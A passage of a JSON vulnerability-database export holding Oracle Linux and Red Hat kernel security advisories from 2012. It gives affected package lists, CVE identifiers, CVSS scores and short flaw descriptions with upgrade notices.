"packageName": "kernel-uek", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.29.2.el6uek", "arch": "i686", "packageFilename": "kernel-uek-devel-2.6.39-200.29.2.el6uek.i686.rpm", "packageName": "kernel-uek-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.29.2.el6uek", "arch": "i686", "packageFilename": "kernel-uek-debug-2.6.39-200.29.2.el6uek.i686.rpm", "packageName": "kernel-uek-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.29.2.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-200.29.2.el5uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.29.2.el5uek", "arch": "noarch", "packageFilename": "kernel-uek-doc-2.6.39-200.29.2.el5uek.noarch.rpm", "packageName": "kernel-uek-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.39-200.29.2.el5uek", "arch": "x86_64", "packageFilename": "kernel-uek-debug-devel-2.6.39-200.29.2.el5uek.x86_64.rpm", "packageName": "kernel-uek-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "2.6.39-200.29.2.el6uek", "arch": "x86_64", "packageFilename": "kernel-uek-2.6.39-200.29.2.el6uek.x86_64.rpm", "packageName": "kernel-uek", "operator": "lt"}], "description": "[2.6.39-200.29.2]\r\n- epoll: clear the tfile_check_list on -ELOOP (Joe Jin) {CVE-2012-3375}\r\n- Don't limit non-nested epoll paths (Jason Baron)\r\n- epoll: kabi fixups for epoll limit wakeup paths (Joe Jin) {CVE-2011-1083}\r\n- epoll: limit paths (Jason Baron) {CVE-2011-1083}\r\n- cred: copy_process() should clear child->replacement_session_keyring (Oleg\r\n Nesterov) {CVE-2012-2745}", "edition": 3, "reporter": "Oracle", "published": "2012-07-16T00:00:00", "title": "Unbreakable Enterprise kernel Security update", "type": "oraclelinux", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2011-1083", "CVE-2012-2745", "CVE-2012-3375"], "modified": "2012-07-16T00:00:00", "id": "ELSA-2012-2025", "href": "http://linux.oracle.com/errata/ELSA-2012-2025.html", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2017-09-09T07:19:39", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageFilename": "kernel-debuginfo-common-2.6.18-308.16.1.el5.i686.rpm", "packageName": "kernel-debuginfo-common", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageFilename": "kernel-PAE-debuginfo-2.6.18-308.16.1.el5.i686.rpm", "packageName": "kernel-PAE-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageFilename": "kernel-debug-debuginfo-2.6.18-308.16.1.el5.i686.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageFilename": "kernel-debuginfo-2.6.18-308.16.1.el5.i686.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageFilename": "kernel-xen-debuginfo-2.6.18-308.16.1.el5.i686.rpm", "packageName": "kernel-xen-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "src", "packageFilename": "kernel-2.6.18-308.16.1.el5.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageFilename": "kernel-debug-debuginfo-2.6.18-308.16.1.el5.x86_64.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageFilename": "kernel-debuginfo-2.6.18-308.16.1.el5.x86_64.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageFilename": "kernel-debuginfo-common-2.6.18-308.16.1.el5.x86_64.rpm", "packageName": "kernel-debuginfo-common", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageFilename": "kernel-xen-debuginfo-2.6.18-308.16.1.el5.x86_64.rpm", "packageName": "kernel-xen-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageFilename": "kernel-PAE-2.6.18-308.16.1.el5.i686.rpm", "packageName": "kernel-PAE", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageFilename": "kernel-PAE-devel-2.6.18-308.16.1.el5.i686.rpm", "packageName": "kernel-PAE-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageFilename": "kernel-debug-2.6.18-308.16.1.el5.i686.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageFilename": "kernel-debug-devel-2.6.18-308.16.1.el5.i686.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageFilename": "kernel-xen-2.6.18-308.16.1.el5.i686.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageFilename": "kernel-xen-devel-2.6.18-308.16.1.el5.i686.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i386", "packageFilename": "kernel-headers-2.6.18-308.16.1.el5.i386.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageFilename": "kernel-2.6.18-308.16.1.el5.i686.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "i686", "packageFilename": "kernel-devel-2.6.18-308.16.1.el5.i686.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "noarch", "packageFilename": "kernel-doc-2.6.18-308.16.1.el5.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageFilename": "kernel-devel-2.6.18-308.16.1.el5.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageFilename": "kernel-headers-2.6.18-308.16.1.el5.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageFilename": "kernel-xen-2.6.18-308.16.1.el5.x86_64.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageFilename": "kernel-2.6.18-308.16.1.el5.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageFilename": "kernel-debug-2.6.18-308.16.1.el5.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageFilename": "kernel-debug-devel-2.6.18-308.16.1.el5.x86_64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "x86_64", "packageFilename": "kernel-xen-devel-2.6.18-308.16.1.el5.x86_64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ppc64", "packageFilename": "kernel-debug-debuginfo-2.6.18-308.16.1.el5.ppc64.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ppc64", "packageFilename": "kernel-debuginfo-2.6.18-308.16.1.el5.ppc64.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ppc64", "packageFilename": "kernel-debuginfo-common-2.6.18-308.16.1.el5.ppc64.rpm", "packageName": "kernel-debuginfo-common", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ppc64", "packageFilename": "kernel-kdump-debuginfo-2.6.18-308.16.1.el5.ppc64.rpm", "packageName": "kernel-kdump-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "s390x", "packageFilename": "kernel-debug-debuginfo-2.6.18-308.16.1.el5.s390x.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "s390x", "packageFilename": "kernel-debuginfo-2.6.18-308.16.1.el5.s390x.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "s390x", "packageFilename": "kernel-kdump-debuginfo-2.6.18-308.16.1.el5.s390x.rpm", "packageName": "kernel-kdump-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "s390x", "packageFilename": "kernel-debuginfo-common-2.6.18-308.16.1.el5.s390x.rpm", "packageName": "kernel-debuginfo-common", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ppc64", "packageFilename": "kernel-2.6.18-308.16.1.el5.ppc64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ppc64", "packageFilename": "kernel-debug-2.6.18-308.16.1.el5.ppc64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ppc64", "packageFilename": "kernel-debug-devel-2.6.18-308.16.1.el5.ppc64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ppc", "packageFilename": "kernel-headers-2.6.18-308.16.1.el5.ppc.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ppc64", "packageFilename": "kernel-headers-2.6.18-308.16.1.el5.ppc64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ppc64", "packageFilename": "kernel-kdump-devel-2.6.18-308.16.1.el5.ppc64.rpm", "packageName": "kernel-kdump-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ppc64", "packageFilename": "kernel-devel-2.6.18-308.16.1.el5.ppc64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ppc64", "packageFilename": "kernel-kdump-2.6.18-308.16.1.el5.ppc64.rpm", "packageName": "kernel-kdump", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "s390x", "packageFilename": "kernel-debug-2.6.18-308.16.1.el5.s390x.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "s390x", "packageFilename": "kernel-2.6.18-308.16.1.el5.s390x.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "s390x", "packageFilename": "kernel-debug-devel-2.6.18-308.16.1.el5.s390x.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "s390x", "packageFilename": "kernel-devel-2.6.18-308.16.1.el5.s390x.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "s390x", "packageFilename": "kernel-kdump-2.6.18-308.16.1.el5.s390x.rpm", "packageName": "kernel-kdump", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "s390x", "packageFilename": "kernel-headers-2.6.18-308.16.1.el5.s390x.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "s390x", "packageFilename": "kernel-kdump-devel-2.6.18-308.16.1.el5.s390x.rpm", "packageName": "kernel-kdump-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ia64", "packageFilename": "kernel-debuginfo-2.6.18-308.16.1.el5.ia64.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ia64", "packageFilename": "kernel-debug-debuginfo-2.6.18-308.16.1.el5.ia64.rpm", "packageName": "kernel-debug-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ia64", "packageFilename": "kernel-debuginfo-common-2.6.18-308.16.1.el5.ia64.rpm", "packageName": "kernel-debuginfo-common", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ia64", "packageFilename": "kernel-xen-debuginfo-2.6.18-308.16.1.el5.ia64.rpm", "packageName": "kernel-xen-debuginfo", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ia64", "packageFilename": "kernel-debug-devel-2.6.18-308.16.1.el5.ia64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ia64", "packageFilename": "kernel-2.6.18-308.16.1.el5.ia64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ia64", "packageFilename": "kernel-debug-2.6.18-308.16.1.el5.ia64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ia64", "packageFilename": "kernel-devel-2.6.18-308.16.1.el5.ia64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ia64", "packageFilename": "kernel-headers-2.6.18-308.16.1.el5.ia64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ia64", "packageFilename": "kernel-xen-devel-2.6.18-308.16.1.el5.ia64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-308.16.1.el5", "arch": "ia64", "packageFilename": "kernel-xen-2.6.18-308.16.1.el5.ia64.rpm", "packageName": "kernel-xen", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* A flaw was found in the way socket buffers (skb) requiring TSO (TCP\nsegment offloading) were handled by the sfc driver. If the skb did not fit\nwithin the minimum-size of the transmission queue, the network card could\nrepeatedly reset itself. A remote attacker could use this flaw to cause a\ndenial of service. (CVE-2012-3412, Important)\n\n* A use-after-free flaw was found in the xacct_add_tsk() function in the\nLinux kernel's taskstats subsystem. A local, unprivileged user could use\nthis flaw to cause an information leak or a denial of service.\n(CVE-2012-3510, Moderate)\n\n* A buffer overflow flaw was found in the hfs_bnode_read() function in the\nHFS Plus (HFS+) file system implementation in the Linux kernel. A local\nuser able to mount a specially-crafted HFS+ file system image could use\nthis flaw to cause a denial of service or escalate their privileges.\n(CVE-2012-2319, Low)\n\n* A flaw was found in the way the msg_namelen variable in the rds_recvmsg()\nfunction of the Linux kernel's Reliable Datagram Sockets (RDS) protocol\nimplementation was initialized. A local, unprivileged user could use this\nflaw to leak kernel stack memory to user-space. (CVE-2012-3430, Low)\n\nRed Hat would like to thank Ben Hutchings of Solarflare (tm) for reporting\nCVE-2012-3412, and Alexander Peslyak for reporting CVE-2012-3510. The\nCVE-2012-3430 issue was discovered by the Red Hat InfiniBand team.\n\nThis update also fixes the following bugs:\n\n* The cpuid_whitelist() function, masking the Enhanced Intel SpeedStep\n(EST) flag from all guests, prevented the \"cpuspeed\" service from working\nin the privileged Xen domain (dom0). CPU scaling was therefore not\npossible. With this update, cpuid_whitelist() is aware whether the domain\nexecuting CPUID is privileged or not, and enables the EST flag for dom0.\n(BZ#846125)\n\n* If a delayed-allocation write was performed before quota was enabled,\nthe kernel displayed the following warning message:\n\n WARNING: at fs/quota/dquot.c:988 dquot_claim_space+0x77/0x112()\n\nThis was because information about the delayed allocation was not recorded\nin the quota structure. With this update, writes prior to enabling quota\nare properly accounted for, and the message is not displayed. (BZ#847326)\n\n* In Red Hat Enterprise Linux 5.9, the DSCP (Differentiated Services Code\nPoint) netfilter module now supports mangling of the DSCP field.\n(BZ#847327)\n\n* Some subsystems clear the TIF_SIGPENDING flag during error handling in\nfork() paths. Previously, if the flag was cleared, the ERESTARTNOINTR error\ncode could be returned. The underlying source code has been modified so\nthat the error code is no longer returned. (BZ#847359)\n\n* An unnecessary check for the RXCW.CW bit could cause the Intel e1000e NIC\n(Network Interface Controller) to not work properly. The check has been\nremoved so that the Intel e1000e NIC works as expected. (BZ#852448)\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.\n", "reporter": "RedHat", "published": "2012-10-02T04:00:00", "type": "redhat", "title": "(RHSA-2012:1323) Important: kernel security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2012-2319", "CVE-2012-3412", "CVE-2012-3430", "CVE-2012-3510"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:19:50", "id": "RHSA-2012:1323", "href": "https://access.redhat.com/errata/RHSA-2012:1323", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-06-06T18:05:09", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "i686", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.32-279.11.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "i686", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-2.6.32-279.11.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "i686", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-2.6.32-279.11.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "i686", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.32-279.11.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "i686", "packageName": "kernel-debuginfo-common-i686", "packageFilename": "kernel-debuginfo-common-i686-2.6.32-279.11.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "src", "packageName": "kernel", "packageFilename": "kernel-2.6.32-279.11.1.el6.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "x86_64", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.32-279.11.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "x86_64", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-2.6.32-279.11.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "x86_64", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.32-279.11.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "x86_64", "packageName": "kernel-debuginfo-common-x86_64", "packageFilename": "kernel-debuginfo-common-x86_64-2.6.32-279.11.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "x86_64", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-2.6.32-279.11.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "i686", "packageName": "python-perf", "packageFilename": "python-perf-2.6.32-279.11.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "x86_64", "packageName": "python-perf", "packageFilename": "python-perf-2.6.32-279.11.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "i686", "packageName": "kernel", "packageFilename": "kernel-2.6.32-279.11.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "i686", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.32-279.11.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "i686", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.32-279.11.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "i686", "packageName": "perf", "packageFilename": "perf-2.6.32-279.11.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.32-279.11.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "noarch", "packageName": "kernel-firmware", "packageFilename": "kernel-firmware-2.6.32-279.11.1.el6.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "i686", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.32-279.11.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "i686", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.32-279.11.1.el6.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "x86_64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.32-279.11.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "x86_64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.32-279.11.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "x86_64", "packageName": "kernel", "packageFilename": "kernel-2.6.32-279.11.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "x86_64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.32-279.11.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "x86_64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.32-279.11.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "x86_64", "packageName": "perf", "packageFilename": "perf-2.6.32-279.11.1.el6.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "ppc64", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.32-279.11.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "ppc64", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.32-279.11.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "ppc64", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-2.6.32-279.11.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "ppc64", "packageName": "kernel-debuginfo-common-ppc64", "packageFilename": "kernel-debuginfo-common-ppc64-2.6.32-279.11.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "ppc64", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-2.6.32-279.11.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "ppc64", "packageName": "python-perf", "packageFilename": "python-perf-2.6.32-279.11.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "ppc64", "packageName": "kernel", "packageFilename": "kernel-2.6.32-279.11.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "ppc64", "packageName": "kernel-bootwrapper", "packageFilename": "kernel-bootwrapper-2.6.32-279.11.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "ppc64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.32-279.11.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "ppc64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.32-279.11.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "ppc64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.32-279.11.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "ppc64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.32-279.11.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "6", "packageVersion": "2.6.32-279.11.1.el6", "arch": "ppc64", "packageName": "perf", "packageFilename": "perf-2.6.32-279.11.1.el6.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", 